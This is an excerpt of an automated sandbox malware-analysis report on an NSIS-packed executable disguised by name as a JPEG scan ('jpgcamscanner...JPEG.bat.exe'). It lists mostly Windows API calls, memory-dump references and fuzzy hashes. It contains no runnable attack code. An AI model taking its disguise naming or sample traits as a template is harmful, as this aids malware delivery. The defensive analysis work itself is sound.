                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Char$Next$Prev
                                  • String ID: "C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 589700163-3597868374
                                  • Opcode ID: 7d136cfff8c7bf043451e4c65a0ab86a2e72481698e5121a5e115d190c3ec359
                                  • Instruction ID: 78b5553556e1b29770c7274e4e8764cd0b55728b37568efcb800383df96c7a9c
                                  • Opcode Fuzzy Hash: 7d136cfff8c7bf043451e4c65a0ab86a2e72481698e5121a5e115d190c3ec359
                                  • Instruction Fuzzy Hash: FF11045180839029FB3226380C40BB76F994F6A760F1900BFE8D2722C2D67C5CA2976E
                                  APIs
                                  • GetWindowLongA.USER32(?,000000EB), ref: 0040408D
                                  • GetSysColor.USER32(00000000), ref: 004040CB
                                  • SetTextColor.GDI32(?,00000000), ref: 004040D7
                                  • SetBkMode.GDI32(?,?), ref: 004040E3
                                  • GetSysColor.USER32(?), ref: 004040F6
                                  • SetBkColor.GDI32(?,?), ref: 00404106
                                  • DeleteObject.GDI32(?), ref: 00404120
                                  • CreateBrushIndirect.GDI32(?), ref: 0040412A
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                  • String ID:
                                  • API String ID: 2320649405-0
                                  • Opcode ID: c86d0c104538bc307405f6e360d8371e1c040facf7e5af7d22035c6604205aa7
                                  • Instruction ID: dc807fd0e826fa60b9ec6720df696095df3ef071cd79e71149a0dd006d979902
                                  • Opcode Fuzzy Hash: c86d0c104538bc307405f6e360d8371e1c040facf7e5af7d22035c6604205aa7
                                  • Instruction Fuzzy Hash: D021B2709047059BCB309F28DC48A4BBBF8AF81715F048A2AFA96B62E0C334E844CB55
                                  APIs
                                    • Part of subcall function 6DDA1215: GlobalAlloc.KERNEL32(00000040,6DDA1233,?,6DDA12CF,-6DDA404B,6DDA11AB,-000000A0), ref: 6DDA121D
                                  • GlobalFree.KERNEL32(?), ref: 6DDA25A2
                                  • GlobalFree.KERNEL32(00000000), ref: 6DDA25DC
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19336656011.000000006DDA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6DDA0000, based on PE: true
                                  • Associated: 00000002.00000002.19336624915.000000006DDA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000002.00000002.19336698506.000000006DDA3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000002.00000002.19336738516.000000006DDA5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_6dda0000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Global$Free$Alloc
                                  • String ID:
                                  • API String ID: 1780285237-0
                                  • Opcode ID: 5d431f85420ca535a957a0409eb0ee789ab8700dd98e00d1cc21a4f34618c106
                                  • Instruction ID: 411144033dbf1e48ac3033ac30a75991e3781b14fcc5b047930901420c045d65
                                  • Opcode Fuzzy Hash: 5d431f85420ca535a957a0409eb0ee789ab8700dd98e00d1cc21a4f34618c106
                                  • Instruction Fuzzy Hash: 8241BF72548212EFD725AF96CCA5D2E7FBAFB87309B0DC52DF64183140CB7198049B66
                                  APIs
                                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404977
                                  • GetMessagePos.USER32 ref: 0040497F
                                  • ScreenToClient.USER32(?,?), ref: 00404999
                                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 004049AB
                                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004049D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Message$Send$ClientScreen
                                  • String ID: f
                                  • API String ID: 41195575-1993550816
                                  • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                  • Instruction ID: 064635845699c0f4496499246dda67b20ede28c923f9f6f9e3dc5f389f782763
                                  • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                  • Instruction Fuzzy Hash: 38015271D00219BADB01DBA4DD85BFFBBBCAF55711F10412BBA10B61C0D7B469018BA5
                                  APIs
                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C97
                                  • MulDiv.KERNEL32(0005CA04,00000064,0005CA08), ref: 00402CC2
                                  • wsprintfA.USER32 ref: 00402CD2
                                  • SetWindowTextA.USER32(?,?), ref: 00402CE2
                                  • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CF4
                                  Strings
                                  • verifying installer: %d%%, xrefs: 00402CCC
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Text$ItemTimerWindowwsprintf
                                  • String ID: verifying installer: %d%%
                                  • API String ID: 1451636040-82062127
                                  • Opcode ID: bae99d8ff7e2baad353350c7eaeb5d71397e6bffa89abe4dcb3f34ba705061ab
                                  • Instruction ID: 8c289f0fb36a9d27d262e5defce623c0a4e81db89a67886656150a2c4b5e1d8a
                                  • Opcode Fuzzy Hash: bae99d8ff7e2baad353350c7eaeb5d71397e6bffa89abe4dcb3f34ba705061ab
                                  • Instruction Fuzzy Hash: 00014F70944208BBEF249F60DD09EEE37A9EB04704F008039FA06B92E0D7B99955CF59
                                  APIs
                                  • GlobalFree.KERNEL32(00000000), ref: 6DDA240B
                                    • Part of subcall function 6DDA1224: lstrcpynA.KERNEL32(00000000,?,6DDA12CF,-6DDA404B,6DDA11AB,-000000A0), ref: 6DDA1234
                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 6DDA2386
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 6DDA239B
                                  • GlobalAlloc.KERNEL32(00000040,00000010), ref: 6DDA23AC
                                  • CLSIDFromString.OLE32(00000000,00000000), ref: 6DDA23BA
                                  • GlobalFree.KERNEL32(00000000), ref: 6DDA23C1
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19336656011.000000006DDA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6DDA0000, based on PE: true
                                  • Associated: 00000002.00000002.19336624915.000000006DDA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000002.00000002.19336698506.000000006DDA3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000002.00000002.19336738516.000000006DDA5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_6dda0000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                  • String ID:
                                  • API String ID: 3730416702-0
                                  • Opcode ID: d1e6ead0ba272c5a8ade36a63fa28fec2d3474843826fcc2edfe0b4c0c8fc76a
                                  • Instruction ID: 07792d52fab7f388c29a7314919eb1eec701ac661f83a9ecf0f94b8b29637c76
                                  • Opcode Fuzzy Hash: d1e6ead0ba272c5a8ade36a63fa28fec2d3474843826fcc2edfe0b4c0c8fc76a
                                  • Instruction Fuzzy Hash: 7A41CF7144C312DFE720AF6AC840B2ABBF8FB53319F08D81EF686CA181D77494458B62
                                  APIs
                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402790
                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027AC
                                  • GlobalFree.KERNEL32(?), ref: 004027EB
                                  • GlobalFree.KERNEL32(00000000), ref: 004027FE
                                  • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402816
                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040282A
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                  • String ID:
                                  • API String ID: 2667972263-0
                                  • Opcode ID: 85e3ba03c3d5ae3b94549db30e13d95ff89437b516cd7b3e456af98cbec2395a
                                  • Instruction ID: 69dabb1dc5664d4cb3e0aedb1da4cd8560a2ff3041f204a353ec2f52c38cd3f1
                                  • Opcode Fuzzy Hash: 85e3ba03c3d5ae3b94549db30e13d95ff89437b516cd7b3e456af98cbec2395a
                                  • Instruction Fuzzy Hash: 7C21BF71C00128BBCF206FA5CE49D9E7A79EF04364F14423AF410762E0C7791D009FA9
                                  APIs
                                  • lstrlenA.KERNEL32(spidskaalshoved Setup: Installing,spidskaalshoved Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,0040476D,000000DF,00000000,00000400,?), ref: 004048F0
                                  • wsprintfA.USER32 ref: 004048F8
                                  • SetDlgItemTextA.USER32(?,spidskaalshoved Setup: Installing), ref: 0040490B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: ItemTextlstrlenwsprintf
                                  • String ID: %u.%u%s%s$spidskaalshoved Setup: Installing
                                  • API String ID: 3540041739-3016917075
                                  • Opcode ID: f42a3f722567b573f866a405e81a790f5d407c7da38f0a888911ea73de824ef5
                                  • Instruction ID: 0ac14a548df83272d562d6c5522d93b353c1d491cf82d9c84c752126d1ac48ba
                                  • Opcode Fuzzy Hash: f42a3f722567b573f866a405e81a790f5d407c7da38f0a888911ea73de824ef5
                                  • Instruction Fuzzy Hash: 2A11D573A041243BDB0065A99C45EAF3288DB85374F254637FE25F71D2EA78CC1285A8
                                  APIs
                                  • GetDC.USER32(?), ref: 00401D9E
                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB8
                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401DC0
                                  • ReleaseDC.USER32(?,00000000), ref: 00401DD1
                                  • CreateFontIndirectA.GDI32(0040A7E8), ref: 00401E20
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                  • String ID:
                                  • API String ID: 3808545654-0
                                  • Opcode ID: b58b48af80338fc5c361f5738cf0c456ed06fa613522f8e9690158e9f906b927
                                  • Instruction ID: 85430ec79d7d493a62f5c90f0650e63f0d0faf8675fc45e27afe54df9b067c18
                                  • Opcode Fuzzy Hash: b58b48af80338fc5c361f5738cf0c456ed06fa613522f8e9690158e9f906b927
                                  • Instruction Fuzzy Hash: CD019271948341AFE7009BB0AE49E9A7FB4DB55305F108479F101BB2E2CA7841909F2F
                                  APIs
                                  • GetDlgItem.USER32(?), ref: 00401D45
                                  • GetClientRect.USER32(00000000,?), ref: 00401D52
                                  • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D73
                                  • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D81
                                  • DeleteObject.GDI32(00000000), ref: 00401D90
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                  • String ID:
                                  • API String ID: 1849352358-0
                                  • Opcode ID: 3e98e30495b11ed96e9f76979364d05835fcfdae40f81675b092c7602420f547
                                  • Instruction ID: 236c2df16a83e1707d8be159829b3a1190eecd98233effbe731bed35476ffb6f
                                  • Opcode Fuzzy Hash: 3e98e30495b11ed96e9f76979364d05835fcfdae40f81675b092c7602420f547
                                  • Instruction Fuzzy Hash: 01F0ECB2A04115BFDB01ABA4DE89DEFBBBCEB44305B044466F601F2191C6749D018B79
                                  APIs
                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
                                  • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: MessageSend$Timeout
                                  • String ID: !
                                  • API String ID: 1777923405-2657877971
                                  • Opcode ID: 5c5cc43d9ea2f1c4f8babb9c5b306aab98c19b0d16ecc4efa158615eb64d646c
                                  • Instruction ID: 3953527ca16890ec8ab59ce35194567eea46ff7bd29c8182c04533b3460f2dbd
                                  • Opcode Fuzzy Hash: 5c5cc43d9ea2f1c4f8babb9c5b306aab98c19b0d16ecc4efa158615eb64d646c
                                  • Instruction Fuzzy Hash: 0C21A2B1E44209BEEF15DFA5D986AAD7BB4EF84304F24843EF501B61D0CB7886418F28
                                  APIs
                                    • Part of subcall function 00405F6A: lstrcpynA.KERNEL32(?,?,00000400,004032A8,00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F77
                                    • Part of subcall function 0040599B: CharNextA.USER32(?,?,shovel\Undrinking.veg,?,00405A07,shovel\Undrinking.veg,shovel\Undrinking.veg,75953410,?,C:\Users\user\AppData\Local\Temp\,00405752,?,75953410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059A9
                                    • Part of subcall function 0040599B: CharNextA.USER32(00000000), ref: 004059AE
                                    • Part of subcall function 0040599B: CharNextA.USER32(00000000), ref: 004059C2
                                  • lstrlenA.KERNEL32(shovel\Undrinking.veg,00000000,shovel\Undrinking.veg,shovel\Undrinking.veg,75953410,?,C:\Users\user\AppData\Local\Temp\,00405752,?,75953410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A43
                                  • GetFileAttributesA.KERNEL32(shovel\Undrinking.veg,shovel\Undrinking.veg,shovel\Undrinking.veg,shovel\Undrinking.veg,shovel\Undrinking.veg,shovel\Undrinking.veg,00000000,shovel\Undrinking.veg,shovel\Undrinking.veg,75953410,?,C:\Users\user\AppData\Local\Temp\,00405752,?,75953410,C:\Users\user\AppData\Local\Temp\), ref: 00405A53
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
